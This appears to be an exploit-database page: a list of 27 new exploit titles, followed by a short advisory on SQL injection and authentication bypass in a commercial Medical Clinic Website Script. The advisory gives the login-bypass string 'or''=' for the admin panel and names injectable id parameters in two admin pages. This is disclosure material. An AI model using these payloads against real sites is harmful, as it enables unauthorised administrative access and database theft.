ef112ace5d
27 new exploits SentryHD 02.01.12e - Privilege Escalation Linux/x86-64 - mkdir Shellcode (25 bytes) ownrs blog beta3 - SQL Injection / Cross-Site Scripting OwnRS blog beta3 - SQL Injection / Cross-Site Scripting Dodo's Quiz Script 1.1 - (dodosquiz.php) Local File Inclusion Dodo's Quiz Script 1.1 - Local File Inclusion Mambo Component SOBI2 RC 2.8.2 - (bid) SQL Injection Mambo Component SOBI2 RC 2.8.2 - SQL Injection Joomla! Component com_pcchess - (game_id) Blind SQL Injection Joomla! Component com_pcchess - Blind SQL Injection Medical Clinic Website Script - SQL Injection Fileserve Clone Script - Authentication Bypass Auction Website Script - SQL Injection Wetransfer Clone Script - Authentication Bypass Finance Website Script - SQL Injection Justdial Clone Script - Authentication Bypass Business Directory Script - SQL Injection Buy and Sell Market Place Software - SQL Injection Dentist Website Script - SQL Injection Manufacturer Website Design Script - SQL Injection Micro Blog Script - SQL Injection My Private Tutor Website Builder Script - SQL Injection NGO Directory Script - SQL Injection Yoga and Fitness Website Script - SQL Injection NGO Website Script - SQL Injection Questions and Answers Script 1.1.3 - SQL Injection Online Mobile Recharge Script - SQL Injection Clone of Oddee Script 1.1.3 - SQL Injection Online Printing Business Clone Script - SQL Injection Online Tshirt Design Script - SQL Injection Shiksha Educational Website Script - SQL Injection Study Abroad Educational Website Script - SQL Injection Courier Management System - SQL Injection Flippa Website Script - SQL Injection B2B Script 4.27 - SQL Injection
17 lines
No EOL
739 B
Text
Executable file
17 lines
No EOL
739 B
Text
Executable file
# # # # #
|
|
# Vulnerability: SQL Injection + Authentication Bypass
|
|
# Date: 18.01.2017
|
|
# Vendor Homepage: http://www.scriptgiant.com/
|
|
# Script Name: Medical Clinic Website Script
|
|
# Script Buy Now: http://www.popularclones.com/products/Medical-Clinic-Website
|
|
# Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Mail : ihsan[beygir]ihsan[nokta]net
|
|
# # # # #
|
|
# Authentication Bypass :
|
|
# http://localhost/[PATH]/admin_giant/ and set Username:'or''=' and Password to 'or''=' and hit enter.
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/admin_giant/add_gallery.php?id=[SQL]
|
|
# http://localhost/[PATH]/admin_giant/add_team_member.php?id=[SQL]
|
|
# E.t.c.... Other files, too. SQL There are security vulnerabilities.
|
|
# # # # # |